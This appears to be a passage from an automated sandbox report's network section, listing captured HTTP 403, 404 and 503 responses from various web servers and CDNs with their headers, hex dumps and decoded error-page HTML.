62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:44:27 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:28 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:44:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1X-Request-ID: 506a129c-02bd-4a99-ae9c-7a3db723243aCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OaVUtG1c%2FAoCUGfZiayFoWjaiWWXC8O3RKuGcv%2BGmvHNPWQsfvfyzqKJChNvA9pkv%2BaD7vf9Gqofmkl22wxzJKk3XzOIqO4xGTxcEIjdD7fDs1tiBEpfEX3sUyvtVmc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=276.000023Server: cloudflareCF-RAY: 7abbc79419829231-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 22 Mar 2023 04:44:28 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:28 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.1.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:29 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NZL9Lwun+M+7c/tw2Pto8/F7ohSd5HIQqoFCM0zJgPyv,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=X-Wix-Request-Id: 1679460269.3371599892816284X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 22 Mar 2023 04:44:29 GMTContent-Type: text/html; charset=utf-8Content-Length: 148Connection: keep-aliveX-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffX-Kong-Upstream-Latency: 1X-Kong-Proxy-Latency: 1Via: kong/1.4.1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 4f 53 54 20 2f 70 61 72 6b 69 6e 67 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot POST /parking/</pre></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Zen-Fury: 3587f71173b70261df8d87a472037a25aa040d80Server: ZENEDGEDate: Wed, 22 Mar 2023 04:44:29 GMTCache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Cache-Status: Data Raw: 31 66 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 31 31 37 30 22 2c 20 31 36 37 39 34 36 30 32 36 39 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 1f9<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC1170", 1679460269, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:44:29 GMTServer: ApacheContent-Length: 13Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Wed, 22 Mar 2023 04:44:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedX-Powered-By: PHP/7.3.33Pragma: no-cacheCache-Control: no-cache, must-revalidate, private, max-age=0Expires: Sat, 26 Jul 1997 05:00:00 GMTRetry-After: 3600Vary: Accept-Encoding,User-AgentData Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 74 69 74 6c 65 3e 59 6f 75 72 20 61 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 73 69 74 65 20 68 61 73 20 62 65 65 6e 20 6c 69 6d 69 74 65 64 20 62 79 20 74 68 65 20 73 69 74 65 20 6f 77 6e 65 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 37 35 72 65 6d 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 33 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 7d 0a 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 7d 0a 0a 09 09 61 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 23 30 30 37 30 39 65 3b 0a 09 09 7d 0a 0a 09 09 68 31 2c 20 68 32 2c 20 68 33 2c 20 68 34 2c 20 68 35 2c 20 68 36 20 7b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 0a 09 09 7d 0a 0a 09 09 68 31 2c 20 2e 68 31 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 72 65 6d 3b 20 7d 0a 09 09 68 32 2c 20 2e 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 35 72 65 6d 3b 20 7d 0a 09 09 68 33 2c 20 2e 68 33 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 72 65 6d 3b 20 7d 0a 09 09 68 34 2c 20 2e 68 34 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 72 65 6d 3b 20 7d 0a 09 09 68 35 2c 20 2e 68 35 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 37 35 72 65 6d 3b 20 7d 0a 09 09 68 36 2c 20 2e 68 36 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 37 35 72 65 6d 3b 20 7d 0a 0a 09 09 68 31 2c 20 68 32 2c 20 68 33 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 7d 0a 09 09 68 34 2c 20 68 35 2c 20 68 36 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 7d 0a 0a 09 09 2e 77 66 2d 62 74 6e 20 7b 0a 09 09 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 22 Mar 2023 04:44:30 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:30 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BPLlDSsxPKJKOq2D5sQRx0f5XojTfRNPv7VHI0z7PQ6nJPO6cb%2FbSyfKPtedpBMtKMhlc9XwP75gVUXrb3ZBx4qkQnpAxBE%2FjueID4FX53eXUxpxLkgnTquZNPjzRHga"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc7a1fc183667-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
